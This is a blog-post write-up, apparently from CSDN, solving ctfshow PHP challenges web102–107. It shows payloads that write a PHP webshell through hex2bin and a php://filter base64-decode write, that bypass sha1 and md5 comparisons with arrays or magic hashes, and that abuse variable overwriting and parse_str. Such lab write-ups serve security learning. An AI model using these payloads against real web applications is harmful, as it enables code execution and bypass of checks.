ctfshow web102-107

最新推荐文章于 2024-05-01 22:46:17 发布
最新推荐文章于 2024-05-01 22:46:17 发布
阅读量3.1k 收藏
点赞数 1
分类专栏: ctfshow 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akxnxbshai/article/details/122696507
版权

目录

Web 102-103

web 104

Web 105

Web 106

Web 107

Web 102-103

substr() 函数返回字符串的一部分

此题中v2被去掉了前两位字符所以到时候给v2前加两个数字

call_user_func函数

php5下is_numeric可识别16进制,如0x2e,然后调用hex2bin转成字符串写入木马,但题目环境没配好,是php7,所以要另换方法。
用伪协议写入,所以需要base64编码后转成16进制全是数字的字符串

<?php

$a='<?=`cat *`;';

$b=base64_encode($a);//$a=PD89YGNhdCAqYDs=

$c=bin2hex('PD89YGNhdCAqYDs');

echo $c;

?>

得到5044383959474e6864434171594473
GET:

?v2=105044383959474e68644341715944&v3=php://filter/wrrite=convert.base64-decode/resource=1.php

POST:v1=hex2bin

然后访问1.php得到flag

web 104

绕过if(sha1($v1)==sha1($v2))即可

payload:

GET:  v2[]=1

POST:  v1[]=2

Web 105

变量覆盖

取一个中间介质:error=a=flag

GET中error不能在等号左边

POST中flag不能在等号右边

所以

GET:?a=flag

POST: error=a

或者直接

GET:?suces=flag&flag=

Web 106

绕过shal且v1不等于v2即可

Payload:

GET: v2[]=1

POST: v1[]=2

Web 107

parse_str() 函数把查询字符串解析到变量中。(以数组的方式)

注释:如果未设置 array 参数,由该函数设置的变量将覆盖已存在的同名变量。

分析代码:

parse_str($v1,$v2)
if($v2['flag']==md5($v3))

要使数组v2等于md5(v3)

方法一:

可以利用parse_str() 函数的特点将v2[‘flag’]的值覆盖

<?php

$b=md5('0');

echo $b;// cfcd208495d565ef66e7dff9f98764da

?>
Payload:

GET:v3=0

POST: v1=flag=cfcd208495d565ef66e7dff9f98764da

方法二:

还可已通过md5的漏洞绕过

Payload:

GET:v3= QNKCDZO

POST:v1=flag=0

f0njl
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
ctfshow web入门 php特性web98-102
m0_62207170的博客
06-24 705
ctfshow web入门 php特性web98-102
ctfshow--web入门(web101--web115&web123&web125-web133)
qing_chuan_的博客
06-08 948
v2$v3反射,通俗来讲就是可以通过一个对象来获取所属类的具体内容,php中内置了强大的反射API:ReflectionClass:一个反射类,功能十分强大,内置了各种获取类信息的方法,创建方式为new ReflectionClass(str 类名),可以用echo new ReflectionClass(‘className’)打印类的信息。ReflectionObject:另一个反射类,创建方式为new ReflectionObject(对象名)。
ctfshow-web入门-102
最新发布
2302_81156108的博客
05-01 1157
本菜鸡感觉自己又行了,请师傅们斧正!!!
CTFshow php特性 web102
Kradress的博客
12-14 610
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: atao # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-23 20:59:43 */ highlight_file(__FILE__); $v1 = $_POST['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3
ctfshow 基础补web入门PHP特性102开始
giaogiao123的博客
06-06 692
<?php highlight_file(__FILE__); $v1 = $_POST['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; $v4 = is_numeric($v2) and is_numeric($v3); if($v4){ $s = substr($v2,2); $str = call_user_func($v1,$s); echo $str; file_put_contents($v3,$str); }
CTFshow web入门web102-php14
weixin_74336671的博客
11-28 86
call_user_func() 函数用于调用方法或者变量,第一个参数是被调用的函数,第二个是调用的函数的参数 file_put_contents($v3,$str)是将$str的内容写入并保存为$v3(第一个参数是文件名,第二个参数是内容)这里v2和v3都要是数字,substr取v2[2:],v2开头可以是00来作为开头,然后v1(v2[2:])。is_numeric() 用于检测是否为数字或数字字符串,如果指定的变量是数字和数字字符串则返回true,否则返回false。首先v2是shell,先整个。
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
web-102:Web 102
05-15
JavaScript课程概述 周概述 -HTML / CSS评论 简介( alert ,变量和prompt ) -注释,数据类型和数学 -单独JavaScript文件和按钮 -布尔值和条件 -DOM操作-从输入中读取 -DOM操作-更新现有HTML并创建新HTML元素 -功能参数 -JavaScript对象 -风格处理,审查,介绍最终项目 -学生从事最终项目 -学生介绍最终项目 11周虚拟学期 对于11周的学期,请跳过第9周的内容,而将第10周的内容下移。 之后,学生应开始进行最终项目。 他们可以在第11周展示他们的项目。此外,在虚拟学期中,请使用而不是VS Code。
CTFshow php特性 web103
Kradress的博客
12-14 394
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: atao # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-23 21:03:24 */ highlight_file(__FILE__); $v1 = $_POST['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3
CTFshow-Web入门》10. Web 91~110
学习学习学习......
10-01 8003
PHP 特性之 preg_match(),换行解析漏洞、intval(),== 与 === 的区别、md5()、in_array()、三元运算、赋值运算【=】优先级、ReflectionClass($class) 建立反射类、is_numeric() 特性,call_user_func() 与 hex2bin() 利用,PHP 伪协议、sha1()、变量覆盖、parse_str() 利用、ereg() 截断漏洞、__toString() 与类触发、FilesystemIterator 类,getcwd()。
ctfshow-php特性(web102-web115)
m0_72125469的博客
02-12 1682
ctfshow-web102 web103 web104 web105 web106 web107 web108 web109 web110 web111 web112 web113 web114 web115
php特性
weixin_74427106的博客
03-30 192
函数parse_str在这里的作用就是将v1的值给v2相当于v1=v2=flag=md5[v3]
ctfshow web入门 PHP特性中篇(web105-web132)
ccfly1012的博客
09-11 1356
目录 web105 web106 web107 web108 web109 web110 web111 web112 web113 web114 web115 web123 web125 web126 web127 web128 web129 web130 web131 web132 web105 <?php ​ /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-09-16 1
ctfshow-web入门-php特性
qq_43618536的博客
07-11 1272
ctfshow-web入门-php特性
ctfshow-web-web红包题
07-14
ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0njl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值